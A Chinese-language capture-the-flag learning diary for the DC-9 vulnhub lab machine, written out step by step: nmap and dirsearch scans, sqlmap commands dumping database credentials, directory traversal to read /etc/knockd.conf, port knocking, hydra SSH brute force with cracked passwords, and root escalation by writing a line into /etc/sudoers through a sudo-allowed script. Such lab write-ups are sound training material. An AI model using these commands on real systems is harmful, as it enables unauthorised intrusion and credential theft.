vulhub靶场学习日记DC9_vulhub 学习报告

DC-9靶机

目的：拿到root权限，查看flag

下载地址：https://www.vulnhub.com/entry/dc-9,412/

选择第二个mirror

Vm打开，网络模式我选择的是nat

Nmap扫描确定靶机130

nmap -sV -sC -A -p 1-65535 192.168.49.130

查看web端

扫描目录，没有很大发现

​
dirsearch -u http://192.168.49.130

Search页面疑似有注入、

bp抓包测试一下，保存post文件

Sqlmap跑一下

跑出来三个数据库

爆user表

sqlmap -r "a.txt"  -p search -D users --tables

爆字段

sqlmap -r "a.txt"  -p search -D users -T UserDetails --columns

跑出来账号密码

sqlmap -r "a.txt"  -p search -D users -T UserDetails -C username,password --dump

密码跑到manager页面测试，发现都不行，看来不是这个库，哦买噶

跑一下staff数据库

sqlmap -r "a.txt"  -p search -D Staff -T Users -C Username,Password –dump

Md5解密一下

成功登录

提升文件不存在，可能存在文件解析，测试file参数进行目录遍历

虽然知道可以目录遍历，可是后面没思路了，网上看大佬博客，还是自己太菜了

通过/proc/sched_debug来查看Linux系统中任务的调度情况

发现knockd

什么是knock

敲门（knock）指的是我们从自己的客户端设备（pc、笔记本或者手机）向服务器IP发送一系列实现约好的暗号，而服务器上需要相应的安装接收暗号的服务knockd，它在接收到正确的暗号的时候，会临时性的为敲门者开一段时间的门并随后关上（当然也能够配置成一直开着），我们要在这几秒钟里面登录成功并且保持连接，如果不小心断了连接就要重新敲门。

knock动作的实质就是连续的向指定的ip的约定的端口连续的发送多个tcp或者udp包，比如我们可以通过*telnet 服务器地址 端口号* 命令来发送tcp包，也可以直接在浏览器地址栏里面用 http://服务器地址:端口号 的方式来让浏览器发出与服务器指定端口tcp握手的SYN包。但是最好用的还是直接下载knock工具（windows版、mac版），用 knock 服务器地址 端口号 的方式来实现敲门

读取下knockd的配置文件：/etc/knockd.conf，获得ssh开门密码：7469,8475,9842

安装knockd，使用它敲开ssh后门

Ssh爆破

hydra -L user.txt -P pass.txt ssh://192.168.49.130

DATA] attacking ssh://192.168.49.130:22/

[22][ssh] host: 192.168.49.130   login: chandlerb   password: UrAG0D!

[22][ssh] host: 192.168.49.130   login: joeyt   password: Passw0rd

[22][ssh] host: 192.168.49.130   login: janitor   password: Ilovepeepee

账号密码挨个登录，发现没有什么不同

Janitor用户发现有点不同

使用上面密码继续ssh爆破

hydra -L user.txt -P pass1.txt ssh://192.168.49.130

登录fredf用户

Sudo尝试一下发现敏感文件

 

该py文件作用：把第一个文件的输入，追加到第二个文件中

往/etc/sudoers里面添加内容，让用户可以以root的权限去执行命令。

/etc/sudoer详解

创建/dev/shm/sudoerAdd，内容如下：

joeyt ALL=(ALL) ALL

然后执行

sudo /opt/devstuff/dist/test/test /dev/shm/sudoerAdd /etc/sudoers

利用sudo执行查看root下命令